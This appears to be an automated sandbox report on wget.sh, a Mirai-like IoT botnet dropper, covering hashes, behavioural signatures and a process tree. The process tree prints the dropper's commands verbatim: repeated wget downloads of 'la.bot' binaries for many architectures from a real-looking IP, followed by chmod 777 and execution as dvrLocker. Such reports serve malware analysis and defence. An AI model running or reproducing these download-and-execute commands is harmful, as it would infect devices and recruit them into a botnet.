Analysis

max time kernel: 149s
max time network: 127s
platform: debian-9_mipsel
resource: debian9-mipsel-20240418-en
resource tags: arch:mipsel, image:debian9-mipsel-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 18/10/2024, 09:41
Static task: static1

Behavioral task: behavioral1
  Sample: wget.sh
  Resource: ubuntu1804-amd64-20240611-en

Behavioral task: behavioral2
  Sample: wget.sh
  Resource: debian9-armhf-20240729-en

Behavioral task: behavioral3
  Sample: wget.sh
  Resource: debian9-mipsbe-20240611-en

Behavioral task: behavioral4
  Sample: wget.sh
  Resource: debian9-mipsel-20240418-en
General

Target: wget.sh
Size: 420B
MD5: 878878ef9a55d128c2917bfb365e4261
SHA1: 3f95d013d7602c813cafd4be15c43c37a9c71d2e
SHA256: bd6ee818b79172a3d43e87463157ee94c942a321fd2ed582610962e323d0817a
SHA512: dfb89655ef3662bb93b765211863cdff5101a00edf9f45b741e8c401402ec429196cf97b4c4e54dfbfc7153b3c50c2ae9da5e3fab45d51a96f0f25ca6c365cf6
Malware Config
Signatures

File and Directory Permissions Modification (1 TTPs, 8 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
  pid  Process
  807  chmod
  815  chmod
  738  chmod
  742  chmod
  746  chmod
  764  chmod
  785  chmod
  803  chmod

Executes dropped EXE (8 IoCs)
  ioc             pid  Process
  /mnt/dvrLocker  739  dvrLocker
  /mnt/dvrLocker  743  dvrLocker
  /mnt/dvrLocker  747  dvrLocker
  /mnt/dvrLocker  766  dvrLocker
  /mnt/dvrLocker  786  dvrLocker
  /mnt/dvrLocker  804  dvrLocker
  /mnt/dvrLocker  808  dvrLocker
  /mnt/dvrLocker  819  dvrLocker

Modifies Watchdog functionality (1 TTPs, 2 IoCs)
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description                   ioc                 Process
  File opened for modification  /dev/watchdog       dvrLocker
  File opened for modification  /dev/misc/watchdog  dvrLocker

Renames itself (2 IoCs)
  pid  Process
  808  dvrLocker
  808  dvrLocker

Unexpected DNS network traffic destination (1 IoCs)
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
  description     ioc
  Destination IP  116.203.104.203

Reads process memory (1 TTPs, 1 IoCs)
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
  description              ioc           Process
  File opened for reading  /proc/1/maps  dvrLocker

Changes its process name (1 IoCs)
  description                                                      ioc      pid  Process
  Changes the process name, possibly in an attempt to hide itself  telnetd  808  dvrLocker

System Network Configuration Discovery (1 TTPs, 2 IoCs)
Adversaries may gather information about the network configuration of a system.
  pid  Process
  789  wget
  806  wget

Writes file to tmp directory (1 IoCs)
Malware often drops required files in the /tmp directory.
  description                   ioc       Process
  File opened for modification  /tmp/.cc  wget.sh
Processes

Process tree (path, command line, PID; indented entries are children of /tmp/wget.sh, signatures listed below each process):

/tmp/wget.sh   /tmp/wget.sh   PID 709
  - Writes file to tmp directory
  /bin/rm   rm -rf dvrLocker   PID 710
  /usr/bin/wget   wget http://103.149.87.69/a/b/la.bot.arm -O -   PID 711
  /bin/chmod   chmod 777 dvrLocker   PID 738
    - File and Directory Permissions Modification
  /mnt/dvrLocker   ./dvrLocker   PID 739
    - Executes dropped EXE
  /usr/bin/wget   wget http://103.149.87.69/a/b/la.bot.arm5 -O -   PID 741
  /bin/chmod   chmod 777 dvrLocker   PID 742
    - File and Directory Permissions Modification
  /mnt/dvrLocker   ./dvrLocker   PID 743
    - Executes dropped EXE
  /usr/bin/wget   wget http://103.149.87.69/a/b/la.bot.arm6 -O -   PID 745
  /bin/chmod   chmod 777 dvrLocker   PID 746
    - File and Directory Permissions Modification
  /mnt/dvrLocker   ./dvrLocker   PID 747
    - Executes dropped EXE
  /usr/bin/wget   wget http://103.149.87.69/a/b/la.bot.arm7 -O -   PID 751
  /bin/chmod   chmod 777 dvrLocker   PID 764
    - File and Directory Permissions Modification
  /mnt/dvrLocker   ./dvrLocker   PID 766
    - Executes dropped EXE
  /usr/bin/wget   wget http://103.149.87.69/a/b/la.bot.m68k -O -   PID 769
  /bin/chmod   chmod 777 dvrLocker   PID 785
    - File and Directory Permissions Modification
  /mnt/dvrLocker   ./dvrLocker   PID 786
    - Executes dropped EXE
  /usr/bin/wget   wget http://103.149.87.69/a/b/la.bot.mips -O -   PID 789
    - System Network Configuration Discovery
  /bin/chmod   chmod 777 dvrLocker   PID 803
    - File and Directory Permissions Modification
  /mnt/dvrLocker   ./dvrLocker   PID 804
    - Executes dropped EXE
  /usr/bin/wget   wget http://103.149.87.69/a/b/la.bot.mipsel -O -   PID 806
    - System Network Configuration Discovery
  /bin/chmod   chmod 777 dvrLocker   PID 807
    - File and Directory Permissions Modification
  /mnt/dvrLocker   ./dvrLocker   PID 808
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Renames itself
    - Reads process memory
    - Changes its process name
  /usr/bin/wget   wget http://103.149.87.69/a/b/la.bot.sh4 -O -   PID 814
  /bin/chmod   chmod 777 dvrLocker   PID 815
    - File and Directory Permissions Modification
  /usr/bin/wget   wget http://103.149.87.69/a/b/la.bot.powerpc -O -   PID 817
  /mnt/dvrLocker   ./dvrLocker   PID 819
    - Executes dropped EXE
  /bin/rm   rm -rf /tmp/wget.sh   PID 822
Network
MITRE ATT&CK Enterprise v15
Downloads